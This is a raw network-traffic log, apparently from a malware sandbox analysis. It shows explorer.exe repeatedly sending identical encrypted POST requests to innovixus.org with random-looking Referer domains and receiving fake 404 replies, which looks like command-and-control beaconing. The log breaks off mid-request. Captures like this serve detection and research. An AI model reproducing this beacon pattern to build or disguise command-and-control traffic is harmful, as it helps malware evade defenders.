                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              5192.168.11.2049759150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:17.206268072 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ygvupudcfqtouxhu.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:17.206268072 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:17.474467993 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:17 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              6192.168.11.2049760150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:17.688817024 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://xspsemcvfgoiut.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:17.688817024 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:17.954338074 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:17 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              7192.168.11.2049761150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:18.168410063 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://pjhnwrnkjwbushkd.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:18.168410063 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:18.424431086 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:18 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              8192.168.11.2049762150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:18.640270948 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://jbnqovqgrlresuvo.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:18.640270948 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:18.906228065 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:18 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              9192.168.11.2049763150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:19.119219065 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://jvdddppcdqqqda.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:19.119219065 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:19.376014948 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:19 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              10192.168.11.2049764150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:19.608824015 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ljcmwxchutvr.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:19.608824015 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:19.864202976 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:19 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              11192.168.11.2049765150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:20.098512888 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://lufxgmktwrqcp.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:20.098512888 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:20.354223967 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:20 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              12192.168.11.2049766150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:20.574558973 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://pyqjpqeimfnbipd.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:20.574558973 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:20.833436012 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:20 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              13192.168.11.2049767150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:21.034841061 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://fggyvuvhssd.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:21.034841061 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:21.291078091 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:21 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              14192.168.11.2049768150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:21.492588997 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://hlfrlthjcrvobluk.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:21.492588997 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:21.751667976 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:21 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              15192.168.11.2049769150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:21.955686092 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://cgsbdsjlngetne.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:21.955687046 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:22.210306883 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:22 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              16192.168.11.2049770150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:22.409552097 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://eukmigsrvyb.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:22.409552097 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:22.672405958 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:22 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              17192.168.11.2049771150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:22.881757975 CET279OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://aydyulcorcfg.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:22.881757975 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:23.139317036 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:23 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              18192.168.11.2049772150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:23.343369961 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://irahodakkogrt.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:23.343369961 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:23.597650051 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:23 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              19192.168.11.2049773150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:23.800704002 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://xynwwxaaxctjsnke.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
